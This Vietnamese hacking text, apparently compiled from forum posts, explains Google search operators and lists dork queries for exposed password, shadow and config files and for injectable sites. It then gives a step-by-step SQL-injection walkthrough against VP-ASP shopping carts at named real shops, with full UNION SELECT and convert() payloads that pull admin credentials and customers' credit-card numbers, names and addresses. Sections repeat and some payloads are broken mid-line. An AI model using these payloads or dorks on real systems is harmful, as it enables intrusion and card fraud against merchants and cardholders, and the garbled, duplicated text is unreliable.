Tương tự, nếu ta muốn truy vấn nhiều hơn một từ trong URL thì ta có thể dùng “allinurl:” thay cho “inurl” để được kết quả là những URL chứa tất cả những từ khóa tìm kiếm.Ví dụ: “allinurl: etc/passwd“ sẽ tìm kiếm những URL có chứa “etc” và “passwd”. Ký hiệu gạch chéo (“/”) giữa các từ sẽ bị Google bỏ qua.
[ site: ]
Cú pháp “site:” giới hạn Google chỉ truy vấn những từ khóa xác định trong một site hoặc tên miền riêng biệt. Ví dụ: “exploits site:hackingspirits.com” (không có ngoặc kép) sẽ tìm kiếm từ khóa “exploits” trong những trang hiện có trong tất cả các link của tên miền “hackingspirits.com”. Không có khoảng trống nào giữa “site:” và “tên miền”.
[ filetype: ]
Cú pháp “filetype:” giới hạn Google chỉ tìm kiếm những files trên internet có phần mở rộng riêng biệt (Ví dụ: doc, pdf hay ppt v.v...). Ví dụ : “filetype:doc site:gov confidential” (không có ngoặc kép) sẽ tìm kiếm những file có phẩn mở rộng là “.doc” trong tất cả những tên miền của chính phủ có phần mở rộng là “.gov” và chứa từ “confidential”(bí mật) trong trang hoặc trong file “.doc”. Ví dụ . Kết quả sẽ bao gồm những liên kết đến tất cả các file văn bản bí trên các site của chính phủ.
[ link: ]
Cú pháp “link:” sẽ liệt kê những trang web mà có các liên kết đến đến những trang web chỉ định. Ví dụ :
chuỗi “link:www.securityfocus.com” sẽ liệt kê những trang web có liên kết trỏ đến trang chủ SecurityFocus.
Chú ý không có khoảng trống giữa "link:" và URL của trang Web.
[ related: ]
Cú pháp “related:” sẽ liệt kê các trang Web "tương tự" với trang Web chỉ định. Ví dụ :“related:www.securityfocus.com” sẽ liệt kê các trang web tương tự với trang chủ Securityfocus. Nhớ rằng không có khoảng trống giữa "related:" và URL của trang Web.
[ cache: ]
Truy vấn “cache:” sẽ cho kết quả là phiên bản của trang Web mà mà Google đã lưu lại. Ví dụ:“cache:www.hackingspirits.com” sẽ cho ra trang đã lưu lại bởi Google's. Nhớ rằng không có khoảng trống giữa "cache:" và URL của trang web.
Nếu bạn bao gồm những từ khác trong truy vấn, Google sẽ điểm sáng những từ này trong văn bản đã được lưu lại.
Ví dụ: “cache:www.hackingspirits.com guest” sẽ cho ra văn bản đã được lưu lại có từ "guest" được điểm sáng.
[ intext: ]
Cú pháp “intext:” tìm kiếm các từ trong một website riêng biệt. Nó phớt lờ các liên kết hoặc URL và tiêu đề của trang.
Ví dụ: “intext:exploits” (không có ngoặc kép) sẽ cho kết quả là những liên kết đến những trang web có từ khóa tìm kiếm là "exploits" trong các trang của nó.
[ phonebook: ]
Cú pháp“phonebook” tìm kiếm thông tin về các địa chỉ đường phố ở Mỹ và số điện thoại. Ví dụ:“phonebook:Lisa+CA” sẽ liệt kê tất cả các tên người có từ “Lisa” trong tên và ở “California (CA)”. Cú pháp này có thể được sử dụng như là một công cụ tuyệt vời của tin tặc trong trường hợp ai đó muốn tìm kiếm thông tin cá nhân cho công việc xã hội.
Truy vấn các site hoặc server dễ bị tấn công sử dụng các cú pháp nâng cao của Google
Những cú pháp truy vấn nâng cao thảo luận ở trên thực sự có thể giúp người ta chính xác hóa các tìm kiếm và có được những gì họ thực sự tìm kiếm.
Bây giờ Google trở thành một máy tìm kiếm thông minh, những người dùng có ác ý không hề bận tâm khai thác khả năng của nó để đào bới những thông tin bí mật từ internet mà chỉ có sự truy cập giới hạn. Bây giờ tôi sẽ thảo luận những kỹ thuật này một cách chi tiết làm thế nào để những người dùng ác tâm đào bới thông tin trên internet sử dụng Google như một công cụ.
Sử dụng cú pháp “Index of ” để tìm kiếm các site cho phép duyệt chỉ mục
Một webserver(máy chủ web) cho phép duyệt chỉ mục nghĩa là bất kỳ ai có thể duyệt các thư mục của webserver như các thư mục nội bộ thông thường. Ở đây tôi sẽ thảo luận làm thế nào để sử dụng cú pháp "index of" để có một danh sách các liên kết đến webserver cho phép duyệt thư mục.
Cách này trở thành một nguồn dễ dàng cho việc thu thập thông tin của tin tặc. Tưởng tưởng nếu họ nắm được các file mật khẩu hoặc các file nhạy cảm khác mà bình thưởng không thể thấy được trên internet.
Dưới đây là vài Ví dụ sử dụng để có được quyền truy cập vào rất nhiều thông tin nhạy cảm dễ dàng hơn rất nhiều:
Index of
/admin
|
Index of
/passwd
|
Index of
/password
|
Index of
/mail
|
"Index
of /" +passwd
|
"Index
of /" +password.txt
|
"Index
of /" +.htaccess
|
"Index
of /secret"
|
"Index
of /confidential"
|
"Index
of /root"
|
"Index
of /cgi-bin"
|
"Index
of /credit-card"
|
"Index
of /logs"
|
"Index
of /config"
|
Tìm kiếm các site hoặc server dễ bị tấn
công sử dụng cú pháp “inurl:” hoặc “allinurl:”
a. Sử dụng “allinurl:winnt/system32/” (không có ngoặc kép) sẽ liệt kê tất cả các liên kết đến server mà cho phép truy cập đến những thư mục giới hạn như “system32” qua web. Nếu bạn đủ may mắn thì bạn có thể có quyền truy cập đến file cmd.exe trong thư mục “system32”. Một khi bạn có quyền truy cập đến file “cmd.exe” và có thể thực thi nó thì bạn có thể tiến lên xa hơn
leo thang quyền của bạn khắp server và làm hại nó.
b. Sử dụng “allinurl:wwwboard/passwd.txt”(không có ngoặc kép) trong
Google search sẽ liệt kê tất cả các liên kết đến server mà dễ bị tấn công vào “tính dễ bị tấn công mật khẩu WWWBoard”. Để biết thêm về tính dễ bị tấn công này bạn có thể vào link sau đây:
http://www.securiteam.com/exploits/2BUQ4S0SAW.html
c. Sử dụng “inurl:.bash_history” (không có ngoặc kép) sẽ liệt kê tất cả các liên kết đến server mà cho phép truy cập vào file
“.bash_history” qua web. Đây là một file lịch sử dòng lệnh. File này bao gồm danh sách các lệnh được thực thi bởi quản trị viên,và đôi khi bao gồm cả thông tin nhạy cảm như mật khẩu
gõ vào bởi quản trị viên. Nếu file này bị làm hại
và nếu nó bao gồm mật khẩu đã mã hóa của hệ thống unix (or *nix)
thì nó có thể dễ dàng bị crack bởi phương pháp “John The Ripper”.
d. Sử dụng “inurl:config.txt” (không có ngoặc kép) sẽ liệt kê tất cả các liên kết đến các máy chủ cho phép truy cập vào file “config.txt”
qua giao diện web. File này bao gồm các thông tin nhạy cảm,
bao gồm giá trị bị băm ra của mật khẩu quản trị và sự xác thực quyền truy cập cơ sở dữ liệu. Ví dụ: Hệ thống quản lý học tập Ingenium
là một ứng dụng Web cho các hệ thống Windows phát triển bởi Click2learn, Inc. Hệ thống quản lý học tập Ingenium
phiên bản 5.1 và 6.1 lưu các thông tin nhạy cảm không an tòan trong file config.txt. Để biết thêm thông tin vào liên kết sau:
http://www.securiteam.com/securitynews/6M00H2K5PG.html
Những tìm kiếm tương tự khác dùng “inurl:” hoặc “allinurl:” kết hợp với các cú pháp khác:
a. Sử dụng “allinurl:winnt/system32/” (không có ngoặc kép) sẽ liệt kê tất cả các liên kết đến server mà cho phép truy cập đến những thư mục giới hạn như “system32” qua web. Nếu bạn đủ may mắn thì bạn có thể có quyền truy cập đến file cmd.exe trong thư mục “system32”. Một khi bạn có quyền truy cập đến file “cmd.exe” và có thể thực thi nó thì bạn có thể tiến lên xa hơn
leo thang quyền của bạn khắp server và làm hại nó.
b. Sử dụng “allinurl:wwwboard/passwd.txt”(không có ngoặc kép) trong
Google search sẽ liệt kê tất cả các liên kết đến server mà dễ bị tấn công vào “tính dễ bị tấn công mật khẩu WWWBoard”. Để biết thêm về tính dễ bị tấn công này bạn có thể vào link sau đây:
http://www.securiteam.com/exploits/2BUQ4S0SAW.html
c. Sử dụng “inurl:.bash_history” (không có ngoặc kép) sẽ liệt kê tất cả các liên kết đến server mà cho phép truy cập vào file
“.bash_history” qua web. Đây là một file lịch sử dòng lệnh. File này bao gồm danh sách các lệnh được thực thi bởi quản trị viên,và đôi khi bao gồm cả thông tin nhạy cảm như mật khẩu
gõ vào bởi quản trị viên. Nếu file này bị làm hại
và nếu nó bao gồm mật khẩu đã mã hóa của hệ thống unix (or *nix)
thì nó có thể dễ dàng bị crack bởi phương pháp “John The Ripper”.
d. Sử dụng “inurl:config.txt” (không có ngoặc kép) sẽ liệt kê tất cả các liên kết đến các máy chủ cho phép truy cập vào file “config.txt”
qua giao diện web. File này bao gồm các thông tin nhạy cảm,
bao gồm giá trị bị băm ra của mật khẩu quản trị và sự xác thực quyền truy cập cơ sở dữ liệu. Ví dụ: Hệ thống quản lý học tập Ingenium
là một ứng dụng Web cho các hệ thống Windows phát triển bởi Click2learn, Inc. Hệ thống quản lý học tập Ingenium
phiên bản 5.1 và 6.1 lưu các thông tin nhạy cảm không an tòan trong file config.txt. Để biết thêm thông tin vào liên kết sau:
http://www.securiteam.com/securitynews/6M00H2K5PG.html
Những tìm kiếm tương tự khác dùng “inurl:” hoặc “allinurl:” kết hợp với các cú pháp khác:
inurl:admin
filetype:txt
|
inurl:admin
filetype:db
|
inurl:admin
filetype:cfg
|
inurl:mysql
filetype:cfg
|
inurl:passwd
filetype:txt
|
inurl:iisadmin
|
inurl:auth_user_file.txt
|
inurl:orders.txt
|
inurl:"wwwroot/*."
|
inurl:adpassword.txt
|
inurl:webeditor.php
|
inurl:file_upload.php
|
inurl:gov
filetype:xls "restricted"
|
index of ftp
+.mdb allinurl:/cgi-bin/ +mailto
|
Tìm kiếm các
site hoặc server dễ bị tấn công dùng “intitle:” hoặc “allintitle:”
a. Sử dụng [allintitle: "index of /root”] (không có ngoặc vuông) sẽ liệt kê các liên kết đến các webserver(máy chủ Web) cho phép truy cập vào các thư mục giới hạn như “root” qua giao diện web. Thư mục này đôi khi bao gồm các thông tin nhạy cảm mà có thể dễ dàng tìm được tqua những yêu cầu Web đơn giản.
b. Sử dụng [allintitle: "index of /admin”] (không có ngoặc vuông) sẽ liệt kê các liên kết đến các website cho phép duyệt chỉ mục các thư mục giới hạn như “admin” qua giao diện web. Hầu hết các ứng dụng web đôi khi sử dụng tên như “admin” để lưu quyền admin trong đó. Thư mục này đôi khi bao hàm các thông tin nhạy cảm mà có thể dễ dàng tìm được qua các yêu cầu Web đơn giản.
Những tìm kiếm tương tự dùng “intitle:” hoặc “allintitle:” kết hợp với các cú pháp khác
a. Sử dụng [allintitle: "index of /root”] (không có ngoặc vuông) sẽ liệt kê các liên kết đến các webserver(máy chủ Web) cho phép truy cập vào các thư mục giới hạn như “root” qua giao diện web. Thư mục này đôi khi bao gồm các thông tin nhạy cảm mà có thể dễ dàng tìm được tqua những yêu cầu Web đơn giản.
b. Sử dụng [allintitle: "index of /admin”] (không có ngoặc vuông) sẽ liệt kê các liên kết đến các website cho phép duyệt chỉ mục các thư mục giới hạn như “admin” qua giao diện web. Hầu hết các ứng dụng web đôi khi sử dụng tên như “admin” để lưu quyền admin trong đó. Thư mục này đôi khi bao hàm các thông tin nhạy cảm mà có thể dễ dàng tìm được qua các yêu cầu Web đơn giản.
Những tìm kiếm tương tự dùng “intitle:” hoặc “allintitle:” kết hợp với các cú pháp khác
intitle:"Index
of" .sh_history
|
intitle:"Index
of" .bash_history
|
intitle:"index
of" passwd
|
intitle:"index
of" people.lst
|
intitle:"index
of" pwd.db
|
intitle:"index
of" etc/shadow
|
intitle:"index
of" spwd
|
intitle:"index
of" master.passwd
|
intitle:"index
of" htpasswd
|
intitle:"index
of" members OR accounts
|
intitle:"index
of" user_carts OR user_cart
|
allintitle:
sensitive filetype:doc
|
allintitle:
restricted filetype :mail
|
allintitle:
restricted filetype:doc site:gov
|
Những truy vấn tìm kiếm thú vị khác
Để tìm những site dễ bị tấn công bằng phương pháp Cross-Sites Scripting (XSS):
allinurl:/scripts/cart32.exe
|
allinurl:/CuteNews/show_archives.php
|
allinurl:/phpinfo.php
|
Để tìm những site dễ bị tấn công bằng
phương pháp SQL Injection:
allinurl:/privmsg.php
|
allinurl:/privmsg.php
|
Bảo mật các
server hoặc site khỏi sự tấn công của Google
Dưới đây là những phương pháp bảo mật mà các quản trị viên và các chuyên gia bảo mật phải đưa vào tài khoản để bảo mật những thông tin then chốt khỏi rơi vào không đúng chỗ:
- Cài những bản vá bảo mật mới nhất cho các ứng dụng cũng như hệ điều hành chạy trên máy chủ.
- Đừng để những thông tin nhạy cảm và then chốt trên máy chủ mà không có hệ thống xác nhận hợp lệ mà có thể bị truy cập trực tiếp bởi bất kỳ ai trên internet.
- Không cho phép duyệt thư mục trên webserver. Duyệt thư mục chỉ nên được cho phép với các thư mục web bạn muốn cho bất kỳ ai trên internet truy cập.
- Nếu bạn tìm thấy bất kỳ liên kết nào đến server hoặc site giới hạn của bạn trong kết quả của Google search thì nó phải được xóa đi. Vào liên kết sau để biết thêm chi tiết: http://www.google.com/remove.html
- Không cho phép truy cập dấu tên vào webserver qua internet
vào các thư mục hệ thống giới hạn.
- Cài các công cụ lọc như URLScan cho các máy chủ chạy IIS như là webserver.
Kết luận
Đôi khi tăng sự phức tạp trong hệ thống tạo ra những sự cố mới. Google trở lên phức tạp hơn có thể được sử dụng bởi bất kỳ anh Tom,
anh Dick & Harry nào đó trên internet để đào bới những thông tin nhạy cảm mà thông thường không thể nhìn thấy hoặc với đến bởi bất kỳ ai.
Người ta không thể ngăn cản ai đó ngừng tạo ra những giả mạo vì vậy những lựa chọn duy nhất còn lại cho những chuyên gia bảo mật và quản trị hệ thống là bảo vệ hệ thống của họ và làm khó khăn hơn từ sự xâm hại không mong muốn.
Dưới đây là những phương pháp bảo mật mà các quản trị viên và các chuyên gia bảo mật phải đưa vào tài khoản để bảo mật những thông tin then chốt khỏi rơi vào không đúng chỗ:
- Cài những bản vá bảo mật mới nhất cho các ứng dụng cũng như hệ điều hành chạy trên máy chủ.
- Đừng để những thông tin nhạy cảm và then chốt trên máy chủ mà không có hệ thống xác nhận hợp lệ mà có thể bị truy cập trực tiếp bởi bất kỳ ai trên internet.
- Không cho phép duyệt thư mục trên webserver. Duyệt thư mục chỉ nên được cho phép với các thư mục web bạn muốn cho bất kỳ ai trên internet truy cập.
- Nếu bạn tìm thấy bất kỳ liên kết nào đến server hoặc site giới hạn của bạn trong kết quả của Google search thì nó phải được xóa đi. Vào liên kết sau để biết thêm chi tiết: http://www.google.com/remove.html
- Không cho phép truy cập dấu tên vào webserver qua internet
vào các thư mục hệ thống giới hạn.
- Cài các công cụ lọc như URLScan cho các máy chủ chạy IIS như là webserver.
Kết luận
Đôi khi tăng sự phức tạp trong hệ thống tạo ra những sự cố mới. Google trở lên phức tạp hơn có thể được sử dụng bởi bất kỳ anh Tom,
anh Dick & Harry nào đó trên internet để đào bới những thông tin nhạy cảm mà thông thường không thể nhìn thấy hoặc với đến bởi bất kỳ ai.
Người ta không thể ngăn cản ai đó ngừng tạo ra những giả mạo vì vậy những lựa chọn duy nhất còn lại cho những chuyên gia bảo mật và quản trị hệ thống là bảo vệ hệ thống của họ và làm khó khăn hơn từ sự xâm hại không mong muốn.
cách khai thác cc shop 2 pass
lôi con shop ra chơi vui đã nhé :
hxxp://www.robstoyshop.com/shopping/shopdisplayproducts.asp?id=2
vẫn làm như bình thường
thêm code này vào :
%20union%20select%201from%20tbluser'
mà cái column này là ở 37 có nghĩa là :
hxxp://www.robstoyshop.com/shopping/shopdisplayproducts.asp?id=2%20union%20select%201, 2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,17,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37% 20from%20tbluers'
và chúng ta vẫn lấy user pass 1 cách bình thưòng nhưng xong! khi tim link admin lại hông thấy chẳng lẽ bó cu ít ra cũng moi móc được đôi chút chứ !bình tĩnh lại 1 chút bắt đầu nào các bác cứ thay tbluser ở trên = order ( 1 điều rất dễ đúng không) có nghĩa là:
hxxp://www.robstoyshop.com/shopping/shopdisplayproducts.asp?id=2%20union%20select%201, 2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,17,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37% 20from%20order'
ok! tiếp tuc khai thác nao. bây h mình thay vào các con số để lấy cc trực tiếp nào
như tôi thay thì như thế naỳ
hxxp://www.robstoyshop.com/shopping/shopdisplayproducts.asp?id=2%20union%20select%201, ofirstname,ocardexpires,olastname,5,6,7,8,9,10,11, 12,13,14,15,16,17,oAuthorization,19,20,21,ocardno, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37%20fro m%20orders'
nó sẽ hiện ra thôi ok
còn đây là kinh nghiệm: các bạn hãy chọn lấy 1 số và lấy số đó giữ nguyên là ocardo còn mấy số khác thay vào mà lấy thông tin đúng với card. và những thứ bạn nên lấy là
odate
ofirstname
olastname
oemail
oaddress
opostcode
ophone
ocardexpires
oAuthorization
ocity
ocardno
HACK Shopping Cart VPASP 4.5 và 5.0
Bước 1: Vào Google.com, tìm cụm từ sau: allinurl: shopdisplaycategories.asp. Bạn sẽ thấy ra cả đống site. Kiểm tra link xem có bị lỗi SQL - Injection hay không ?
Bước 2:
Đối với phiên bản VPASP 4.5 thì lỗi tại file shopdisplaycategories.asp và shopdisplayproducts.asp. Ở phiên bản VPASP 5.0 thì đã sửa lỗi hai file trên nhưng còn một chỗ vẫn bị lỗi là file shopexd.asp
Ví dụ site sau:
hxxp://www.hopscotchdressingup.co.uk/store/shopdisplayproducts.asp?id=8'&cat=Halloween.
Mặc dù ta đã thêm ' ở tại shopdisplayproducts.asp?id=8' nhưng vẫn không bị lỗi. Ta thử tiếp file link sau :
hxxp://www.hopscotchdressingup.co.uk/store/shopexd.asp?id=149'. Nó xuất hiện lỗi HTTP 500 - Internal server error Internet Explorer
Bước 3:
Ta thực hiện gộp lệnh để lấy giá trị username và password như sau:
Link ban đầu :hxxp://www.hopscotchdressingup.co.uk/store/shopexd.asp?id=149
Link gộp truy vấn : hxxp://www.hopscotchdressingup.co.uk/store/shopexd.asp?id=-1 union select catalogid,ccode,fldusername%2b'/'% 2bfldpassword,cdescription,cprice,ccategory,cdescu rl,features,cimageurl,cstock,w
eight,mfg,pother1,pother2,pother3,subcategoryid,re tailprice,specialoffer,category, buttonimage,cdateavailable,allowusertext,pother4,pother5,userid,keywords,templ
ate,extendedimage,extendeddesc,selectlist,level3,l evel4,level5,minimumquantity,s
upplierid,crossselling,hide,productmatch,customermatch,orderattachment, orderdownload,groupfordiscount,clanguage,points,pointstobuy ,price2,price3,billprice,billinstallments,billinstallmenttype,billinterval,maxim umquantity,frontpage from products,tbluser where catalogid=149
Các bạn sẽ hỏi là cái đống hỗn độn ở link trên lấy ở đâu ra? Hì hì chỉ đọc source VPASP mới biết nó gồm những trường nào trong bản product rồi từ đó gộp
lệnh cho đủ các trường và thay thế trường tên của sản phầm bằng trường username và password. Sở dĩ ta phải cho id=-1 để ngắt lệnh SQL thứ nhất khi
hợp nhất thì nó sẽ thực hiện lệnh SQL thứ hai.
Sau khi hợp SQL ta sẽ có kết quả user và password là "Sy87XXXXX/gL37ytXXXXX" là hai giá trị được thay thế tại tên của sản phẩm.
Như vậy ta đã có user và password của admin rồi. Mừng quá login vào shopadmin.asp thôi ! . Thông thường thì tên file Admin ControlPanel là
shopadmin.asp nếu như nó chưa đổi.
Bước 4: Ta truy cập vào hxxp://www.hopscotchdressingup.co.uk/store/shopadmin.asp thử xem thế nào? Chà ! file nó đổi tên mất rồi. Làm sao đây ? Tiếp tục gộp lệnh để lấy tên file đã thay đổi thôi !
Cũng với link hxxp://www.hopscotchdressingup.co.uk/store/shopexd.asp?id=149 ta gộp lệnh như sau để lấy tên file truy cập vào Admin Control Panel.
hxxp://www.hopscotchdressingup.co.u...opexd.asp?id=-1 union select catalogid,ccode,fieldvalue,cdescription,cprice,cca tegory,cdescurl,features,cimag
eurl,cstock,weight,mfg,pother1,pother2,pother3,sub categoryid,retailprice,special
offer,category,buttonimage,cdateavailable,allowuse rtext,pother4,pother5,userid,k
eywords,template,extendedimage,extendeddesc,select list,level3,level4,level5,mini
mumquantity,supplierid,crossselling,hide,productmatch,customermatch,orderattachment,orderdownload,groupfordiscount,clanguage,points,pointstobuy,price2,price3,billprice,billinstallments,billinstallmenttype,billi nterval,maximumquantity,frontp
age from products,configuration where fieldname='xadminpage' and catalogid=149
Sau khi thực hiện ta đã có tên file truy cập vào Admin Control Panel là hopoff.asp
Như vậy ta có thể truy cập đến file Admin. hxxp://www.hopscotchdressingup.co.uk/store/hopoff.asp.
Lưu ý: Khi truy cập vào Admin Control Panel nếu gặp hai trường nhập password thì : một là ngồi thử hai là đi kiếm cái khác . Vì password thứ 2 là một hằng nên không thể dùng cách hợp lệnh để lấy được. Muốn lấy chắc viết email đến admin hỏi thử password thứ hai là gì, tôi đã có password thứ nhất của you rôi.
Đối với phiên bản VPASP 4.5 thì cũng làm tương tự như trên chỉ khác là ở chỗ gộp lệnh lấy username, password và tên file truy cập vào Admin ControlPanel
Ví dụ : hxxp:///shopdisplaycategories.asp?id=1 chẳng hạn. Thì lệnh gộp lấy username, password và tên file admin như sau
http:///shopdisplaycategories.asp?id=1 union select catalogid,ccode,fldusername%2b':'% 2bfldpassword,cdescription,cprice,ccategory,cdescu rl,features,cimageurl,cstock,w
eight,mfg,pother1,pother2,pother3,subcategoryid,re tailprice,specialoffer,categor
y,buttonimage,cdateavailable,allowusertext,pother4,pother5,userid,keywords,templ
ate,extendedimage,extendeddesc,selectlist,level3,l evel4,level5,minimumquantity,s
upplierid,crossselling,hide,productmatch,customermatch,orderattachment,orderdownload,groupfordiscount,clanguage,points,pointstobuy ,price2,price3 from products,tbluser where 1=1 or 1=1
lôi con shop ra chơi vui đã nhé :
hxxp://www.robstoyshop.com/shopping/shopdisplayproducts.asp?id=2
vẫn làm như bình thường
thêm code này vào :
%20union%20select%201from%20tbluser'
mà cái column này là ở 37 có nghĩa là :
hxxp://www.robstoyshop.com/shopping/shopdisplayproducts.asp?id=2%20union%20select%201, 2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,17,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37% 20from%20tbluers'
và chúng ta vẫn lấy user pass 1 cách bình thưòng nhưng xong! khi tim link admin lại hông thấy chẳng lẽ bó cu ít ra cũng moi móc được đôi chút chứ !bình tĩnh lại 1 chút bắt đầu nào các bác cứ thay tbluser ở trên = order ( 1 điều rất dễ đúng không) có nghĩa là:
hxxp://www.robstoyshop.com/shopping/shopdisplayproducts.asp?id=2%20union%20select%201, 2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,17,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37% 20from%20order'
ok! tiếp tuc khai thác nao. bây h mình thay vào các con số để lấy cc trực tiếp nào
như tôi thay thì như thế naỳ
hxxp://www.robstoyshop.com/shopping/shopdisplayproducts.asp?id=2%20union%20select%201, ofirstname,ocardexpires,olastname,5,6,7,8,9,10,11, 12,13,14,15,16,17,oAuthorization,19,20,21,ocardno, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37%20fro m%20orders'
nó sẽ hiện ra thôi ok
còn đây là kinh nghiệm: các bạn hãy chọn lấy 1 số và lấy số đó giữ nguyên là ocardo còn mấy số khác thay vào mà lấy thông tin đúng với card. và những thứ bạn nên lấy là
odate
ofirstname
olastname
oemail
oaddress
opostcode
ophone
ocardexpires
oAuthorization
ocity
ocardno
HACK Shopping Cart VPASP 4.5 và 5.0
Bước 1: Vào Google.com, tìm cụm từ sau: allinurl: shopdisplaycategories.asp. Bạn sẽ thấy ra cả đống site. Kiểm tra link xem có bị lỗi SQL - Injection hay không ?
Bước 2:
Đối với phiên bản VPASP 4.5 thì lỗi tại file shopdisplaycategories.asp và shopdisplayproducts.asp. Ở phiên bản VPASP 5.0 thì đã sửa lỗi hai file trên nhưng còn một chỗ vẫn bị lỗi là file shopexd.asp
Ví dụ site sau:
hxxp://www.hopscotchdressingup.co.uk/store/shopdisplayproducts.asp?id=8'&cat=Halloween.
Mặc dù ta đã thêm ' ở tại shopdisplayproducts.asp?id=8' nhưng vẫn không bị lỗi. Ta thử tiếp file link sau :
hxxp://www.hopscotchdressingup.co.uk/store/shopexd.asp?id=149'. Nó xuất hiện lỗi HTTP 500 - Internal server error Internet Explorer
Bước 3:
Ta thực hiện gộp lệnh để lấy giá trị username và password như sau:
Link ban đầu :hxxp://www.hopscotchdressingup.co.uk/store/shopexd.asp?id=149
Link gộp truy vấn : hxxp://www.hopscotchdressingup.co.uk/store/shopexd.asp?id=-1 union select catalogid,ccode,fldusername%2b'/'% 2bfldpassword,cdescription,cprice,ccategory,cdescu rl,features,cimageurl,cstock,w
eight,mfg,pother1,pother2,pother3,subcategoryid,re tailprice,specialoffer,category, buttonimage,cdateavailable,allowusertext,pother4,pother5,userid,keywords,templ
ate,extendedimage,extendeddesc,selectlist,level3,l evel4,level5,minimumquantity,s
upplierid,crossselling,hide,productmatch,customermatch,orderattachment, orderdownload,groupfordiscount,clanguage,points,pointstobuy ,price2,price3,billprice,billinstallments,billinstallmenttype,billinterval,maxim umquantity,frontpage from products,tbluser where catalogid=149
Các bạn sẽ hỏi là cái đống hỗn độn ở link trên lấy ở đâu ra? Hì hì chỉ đọc source VPASP mới biết nó gồm những trường nào trong bản product rồi từ đó gộp
lệnh cho đủ các trường và thay thế trường tên của sản phầm bằng trường username và password. Sở dĩ ta phải cho id=-1 để ngắt lệnh SQL thứ nhất khi
hợp nhất thì nó sẽ thực hiện lệnh SQL thứ hai.
Sau khi hợp SQL ta sẽ có kết quả user và password là "Sy87XXXXX/gL37ytXXXXX" là hai giá trị được thay thế tại tên của sản phẩm.
Như vậy ta đã có user và password của admin rồi. Mừng quá login vào shopadmin.asp thôi ! . Thông thường thì tên file Admin ControlPanel là
shopadmin.asp nếu như nó chưa đổi.
Bước 4: Ta truy cập vào hxxp://www.hopscotchdressingup.co.uk/store/shopadmin.asp thử xem thế nào? Chà ! file nó đổi tên mất rồi. Làm sao đây ? Tiếp tục gộp lệnh để lấy tên file đã thay đổi thôi !
Cũng với link hxxp://www.hopscotchdressingup.co.uk/store/shopexd.asp?id=149 ta gộp lệnh như sau để lấy tên file truy cập vào Admin Control Panel.
hxxp://www.hopscotchdressingup.co.u...opexd.asp?id=-1 union select catalogid,ccode,fieldvalue,cdescription,cprice,cca tegory,cdescurl,features,cimag
eurl,cstock,weight,mfg,pother1,pother2,pother3,sub categoryid,retailprice,special
offer,category,buttonimage,cdateavailable,allowuse rtext,pother4,pother5,userid,k
eywords,template,extendedimage,extendeddesc,select list,level3,level4,level5,mini
mumquantity,supplierid,crossselling,hide,productmatch,customermatch,orderattachment,orderdownload,groupfordiscount,clanguage,points,pointstobuy,price2,price3,billprice,billinstallments,billinstallmenttype,billi nterval,maximumquantity,frontp
age from products,configuration where fieldname='xadminpage' and catalogid=149
Sau khi thực hiện ta đã có tên file truy cập vào Admin Control Panel là hopoff.asp
Như vậy ta có thể truy cập đến file Admin. hxxp://www.hopscotchdressingup.co.uk/store/hopoff.asp.
Lưu ý: Khi truy cập vào Admin Control Panel nếu gặp hai trường nhập password thì : một là ngồi thử hai là đi kiếm cái khác . Vì password thứ 2 là một hằng nên không thể dùng cách hợp lệnh để lấy được. Muốn lấy chắc viết email đến admin hỏi thử password thứ hai là gì, tôi đã có password thứ nhất của you rôi.
Đối với phiên bản VPASP 4.5 thì cũng làm tương tự như trên chỉ khác là ở chỗ gộp lệnh lấy username, password và tên file truy cập vào Admin ControlPanel
Ví dụ : hxxp:///shopdisplaycategories.asp?id=1 chẳng hạn. Thì lệnh gộp lấy username, password và tên file admin như sau
http:///shopdisplaycategories.asp?id=1 union select catalogid,ccode,fldusername%2b':'% 2bfldpassword,cdescription,cprice,ccategory,cdescu rl,features,cimageurl,cstock,w
eight,mfg,pother1,pother2,pother3,subcategoryid,re tailprice,specialoffer,categor
y,buttonimage,cdateavailable,allowusertext,pother4,pother5,userid,keywords,templ
ate,extendedimage,extendeddesc,selectlist,level3,l evel4,level5,minimumquantity,s
upplierid,crossselling,hide,productmatch,customermatch,orderattachment,orderdownload,groupfordiscount,clanguage,points,pointstobuy ,price2,price3 from products,tbluser where 1=1 or 1=1
http:///shopdisplaycategories.asp?id=1
union select catalogid,ccode,fieldvalue,cdescription,cprice,cca
tegory,cdescurl,features,cimag
eurl,cstock,weight,mfg,pother1,pother2,pother3,sub categoryid,retailprice,special
offer,category,buttonimage,cdateavailable,allowuse rtext,pother4,pother5,userid,k
eywords,template,extendedimage,extendeddesc,select list,level3,level4,level5,mini
mumquantity,supplierid,crossselling,hide,productma tch,customermatch,orderattachm
ent,orderdownload,groupfordiscount,clanguage,point s,pointstobuy,price2,price3 from products,tbluser,configuration where fieldname='xadminpage'
Site VPASP sử dụng cơ sở dữ liệu SQL - Server thì quá dễ để khai thác như sau
http:///shopdisplaycategories.asp?id=1
and%201=convert(int,(select%20top%201%20fldusernam e%2b'/'%2bfldpassword%20from%20tbluser))--sp_password
http:///shopdisplaycategories.asp?id=1 and%201=convert(int,(select top 1 fieldvalue from configuration where
fieldname='xadminpage'))--sp_password
eurl,cstock,weight,mfg,pother1,pother2,pother3,sub categoryid,retailprice,special
offer,category,buttonimage,cdateavailable,allowuse rtext,pother4,pother5,userid,k
eywords,template,extendedimage,extendeddesc,select list,level3,level4,level5,mini
mumquantity,supplierid,crossselling,hide,productma tch,customermatch,orderattachm
ent,orderdownload,groupfordiscount,clanguage,point s,pointstobuy,price2,price3 from products,tbluser,configuration where fieldname='xadminpage'
Site VPASP sử dụng cơ sở dữ liệu SQL - Server thì quá dễ để khai thác như sau
http:///shopdisplaycategories.asp?id=1
and%201=convert(int,(select%20top%201%20fldusernam e%2b'/'%2bfldpassword%20from%20tbluser))--sp_password
http:///shopdisplaycategories.asp?id=1 and%201=convert(int,(select top 1 fieldvalue from configuration where
fieldname='xadminpage'))--sp_password
Cách hack = google
Chào các bạn,
